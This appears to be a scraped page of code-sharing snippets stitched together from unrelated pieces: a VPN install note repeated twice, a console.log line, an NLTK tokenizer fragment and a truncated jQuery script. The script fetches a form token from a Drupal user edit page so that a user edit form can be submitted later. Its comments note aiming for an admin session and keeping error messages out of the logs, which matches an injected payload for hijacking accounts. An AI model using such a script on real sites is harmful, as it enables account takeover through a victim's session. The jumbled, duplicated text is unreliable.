Download forticlient SSL VPN from the below link:
http://www.iitk.ac.in/cc/vpn_update/sslvpn.htm
Extract the file and save to any location.
Now use this command
chmod +x forticlientsslvpn
Download forticlient SSL VPN from the below link:
http://www.iitk.ac.in/cc/vpn_update/sslvpn.htm
Extract the file and save to any location.
Now use this command
chmod +x forticlientsslvpn
// Use Gists to store code you would like to remember later on | |
console.log(window); // log the "window" object to the console |
import nltk | |
text = """The Buddha, the Godhead, resides quite as comfortably in the circuits of a digital | |
computer or the gears of a cycle transmission as he does at the top of a mountain | |
or in the petals of a flower. To think otherwise is to demean the Buddha...which is | |
to demean oneself.""" | |
# Used when tokenizing words | |
sentence_re = r'''(?x) # set flag to allow verbose regexps | |
([A-Z])(\.[A-Z])+\.? # abbreviations, e.g. U.S.A. |
// Test for the presence of jquery. | |
if (typeof jQuery == 'function') { | |
// Fetch a correct token from user/1/edit because we will need it to | |
// successfully submit the user edit form later. | |
// TODO: Include a check to increase the chance that the current user is admin, | |
// which will reduce the number of access denied error messages in the log. | |
jQuery.get(Drupal.settings.basePath + 'user/7/edit', | |
function (data, status) { | |
if (status == 'success') { | |
// Extract the token and other required data |